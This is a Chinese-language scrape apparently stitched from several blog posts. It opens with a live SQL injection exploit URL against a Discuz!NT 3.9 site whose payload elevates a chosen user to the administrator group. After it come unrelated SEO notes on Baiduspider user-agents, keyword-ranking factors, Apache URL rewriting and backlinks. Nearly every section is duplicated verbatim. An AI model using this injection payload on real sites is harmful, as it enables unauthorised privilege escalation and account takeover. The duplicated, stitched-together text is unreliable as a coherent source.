简要描述:DNT官网存在SQL注入漏洞,Powered by Discuz!NT 3.9.913 Beta
注入地址:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1
利用:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29--
注入地址:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1
利用:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29--
由于过年太忙了,域名到期了,幸好及时续费了,不过还是被百度k掉了。
Baiduspider - 百度蜘蛛:
百度是如何收录到那么多网页的呢?这个百度用以抓取互联网上数以亿计的网页的程序,就叫做Baiduspider - 百度蜘蛛。
它是一个程序,夜以继日得在互联网上找寻新的URL,接着抓取URL上的内容,返回到百度的网页暂存数据库。
百度用来抓取网页内容的程序,叫做Baiduspider,抓取其他内容的蜘蛛,则是新的名字:
产品名称 对应user-agent
网页搜索 Baiduspider
无线搜索 Baiduspider-mobile
图片搜索 Baiduspider-image
视频搜索 Baiduspider-video
新闻搜索 Baiduspider-news
百度搜藏 Baiduspider-favo
百度联盟 Baiduspider-cpro
不少朋友会在自己的网站日志里看到这个蜘蛛Baiduspider-cpro,现在我们明白它是百度联盟蜘蛛,用以百度联盟程序匹配相应的广告。
Baiduspider - 百度蜘蛛:
百度是如何收录到那么多网页的呢?这个百度用以抓取互联网上数以亿计的网页的程序,就叫做Baiduspider - 百度蜘蛛。
它是一个程序,夜以继日得在互联网上找寻新的URL,接着抓取URL上的内容,返回到百度的网页暂存数据库。
百度用来抓取网页内容的程序,叫做Baiduspider,抓取其他内容的蜘蛛,则是新的名字:
产品名称 对应user-agent
网页搜索 Baiduspider
无线搜索 Baiduspider-mobile
图片搜索 Baiduspider-image
视频搜索 Baiduspider-video
新闻搜索 Baiduspider-news
百度搜藏 Baiduspider-favo
百度联盟 Baiduspider-cpro
不少朋友会在自己的网站日志里看到这个蜘蛛Baiduspider-cpro,现在我们明白它是百度联盟蜘蛛,用以百度联盟程序匹配相应的广告。
决定关键字权重的大参数(之所以用大参数,是因为小参数还很多):
1、这个网页的PR值、这个网页主域名的PR值;
2、关键字在网页标题中的比重(就是比例)和位置;
3、关键字在meta标签中是否被提及;
4、网页内是否有很多与该关键字相关的关键字词组;
5、关键字在网页上的密度(3-8%)为佳,显眼度(加粗、变大、换字体等),位置(h1,h2,还是网页底部?)
6、以这个关键字链接向本页面的外部链接和内部链接数量。分别按一个阻尼指数线性叠加。通俗说法是,一个外部链接投一票。
这6个大的参数重要性相当,都为这个网页在某个“关键字”中的排名起到大概六份一的力量。其中2-5点告诉搜索引擎该关键字在这个页面中属于什么档次,也就是说,告诉搜索引擎,我们这个页面关于这个关键字有多大的专业。(如果该关键字是所有关键字中的是老大,或者是唯一的,那显然要牛很多);
1、这个网页的PR值、这个网页主域名的PR值;
2、关键字在网页标题中的比重(就是比例)和位置;
3、关键字在meta标签中是否被提及;
4、网页内是否有很多与该关键字相关的关键字词组;
5、关键字在网页上的密度(3-8%)为佳,显眼度(加粗、变大、换字体等),位置(h1,h2,还是网页底部?)
6、以这个关键字链接向本页面的外部链接和内部链接数量。分别按一个阻尼指数线性叠加。通俗说法是,一个外部链接投一票。
这6个大的参数重要性相当,都为这个网页在某个“关键字”中的排名起到大概六份一的力量。其中2-5点告诉搜索引擎该关键字在这个页面中属于什么档次,也就是说,告诉搜索引擎,我们这个页面关于这个关键字有多大的专业。(如果该关键字是所有关键字中的是老大,或者是唯一的,那显然要牛很多);
这是SEO过程中最经常碰到的问题,也是必须解决的问题。因为搜索引擎喜欢静态页面。从Web服务器的角度,这个问题转变为:如何将静态化的文件名称转化成参数。
需要两步来处理:
1、把网页上带链接的地方,都换上新的静态化链接。搜索引擎和浏览器将通过该链接来发生请求。(有些人做修改不是在网页上,而是进行动态链接向静态链接的转向,这是严重错误的)
2、在httpd.conf或.htaccess中使用RewriteRule:
RewriteRule "^/dir/ ([^./]*) \.html" "/dir/script.cgi?doc=$1" [PT]
[PT]标记告诉Apache执行后续的所有操作。
通过这个功能,使动态页面以静态链接的形式展示给搜索引擎,从而达到URL优化的目的。如SEO十万个为什么整站都是通过该方式实现。
需要两步来处理:
1、把网页上带链接的地方,都换上新的静态化链接。搜索引擎和浏览器将通过该链接来发生请求。(有些人做修改不是在网页上,而是进行动态链接向静态链接的转向,这是严重错误的)
2、在httpd.conf或.htaccess中使用RewriteRule:
RewriteRule "^/dir/ ([^./]*) \.html" "/dir/script.cgi?doc=$1" [PT]
[PT]标记告诉Apache执行后续的所有操作。
通过这个功能,使动态页面以静态链接的形式展示给搜索引擎,从而达到URL优化的目的。如SEO十万个为什么整站都是通过该方式实现。
经常听到大家在落伍论坛里说反向链接多么重要,但我一头雾水,到底什么是反向链接?
看以上这行内容中,“熊熊碎碎念”这几个字链接指向了 http://www.lusheng.org/blog/。这个链接我们称为 直接链接。
对于熊熊的碎碎念来讲,这个链接是它的反向链接。
简单概括如下:
网页A 上有一个链接指向网页B,则网页A 上的链接是网页B 的反向链接。
SEO 中谈到的反向链接又叫导入链接(Backlinks),外部链接。但反向链接的概括包括了站内和站外的导入链接。
注意:以上的定义只是在SEO 中的说法。
如需了解反向链接更广泛的意思请往下看。
如以上第一个例子,本文可以通过代码(如:href=)直接指向到其他的已经存在的网页。那么能否在本文的网页中也添加某代码,使得已经存在的网页自动地链接指向本文呢?
那么这里的反向链接是什么意思?
不修改已经存在的网页,而要求其链接指向新产生的网页。目前本技术并没有广泛使用。
看以上这行内容中,“熊熊碎碎念”这几个字链接指向了 http://www.lusheng.org/blog/。这个链接我们称为 直接链接。
对于熊熊的碎碎念来讲,这个链接是它的反向链接。
简单概括如下:
网页A 上有一个链接指向网页B,则网页A 上的链接是网页B 的反向链接。
SEO 中谈到的反向链接又叫导入链接(Backlinks),外部链接。但反向链接的概括包括了站内和站外的导入链接。
注意:以上的定义只是在SEO 中的说法。
如需了解反向链接更广泛的意思请往下看。
如以上第一个例子,本文可以通过代码(如:href=)直接指向到其他的已经存在的网页。那么能否在本文的网页中也添加某代码,使得已经存在的网页自动地链接指向本文呢?
那么这里的反向链接是什么意思?
不修改已经存在的网页,而要求其链接指向新产生的网页。目前本技术并没有广泛使用。
